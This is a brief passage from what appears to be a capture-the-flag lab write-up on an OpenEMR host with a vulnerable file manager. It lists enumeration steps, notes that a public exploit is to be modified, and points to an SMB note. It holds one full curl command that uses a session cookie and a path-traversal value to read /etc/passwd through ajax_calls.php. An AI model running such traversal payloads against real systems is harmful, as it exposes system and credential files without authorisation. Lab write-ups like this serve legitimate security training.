80
There is openemr: 

There are also files in source directory: 
There is also a filemanager directory:

Now checking searchsploit:

Now first capturing the cookie with burpsuite:
Now curl:
curl -X POST -d "path=../../../../../../../etc/passwd" -H "Cookie: PHPSESSID=12k93hcuj6b7qt2jmnn40rd612" "http://192.168.190.145/filemanager/ajax_calls.php?action=get_file&sub_action=edit&preview_mode=text"
But we can not view php files So using this exploit:
Now we can modify the exploit:
Now it will paste in /Documents folder which we discovered in smb.
Check in smb at [[PG Practice/Apex/445]]
Last updated
Was this helpful?